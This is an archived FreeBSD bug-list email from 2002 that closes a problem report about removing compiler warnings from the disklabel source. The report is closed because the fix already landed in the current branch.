from freefall.freebsd.org (johan@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g742iEJU001586; Sat, 3 Aug 2002 19:44:15 -0700 (PDT) (envelope-from johan@freefall.freebsd.org) Received: (from johan@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g742iE2d001582; Sat, 3 Aug 2002 19:44:14 -0700 (PDT) Date: Sat, 3 Aug 2002 19:44:14 -0700 (PDT) From: Johan Karlsson Message-Id: <200208040244.g742iE2d001582@freefall.freebsd.org> To: dan@obluda.cz, johan@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/39817: cleaning sbin/disklabel code from warnings Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: cleaning sbin/disklabel code from warnings State-Changed-From-To: open->closed State-Changed-By: johan State-Changed-When: Sat Aug 3 19:39:46 PDT 2002 State-Changed-Why: This was fixed in rev 1.49 in current. This kind of fixes are hardly ever MFCed. Since all changes like this goes to into current, if you want to send other patches to remove warning, please send them for current instead. http://www.freebsd.org/cgi/query-pr.cgi?pr=39817 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message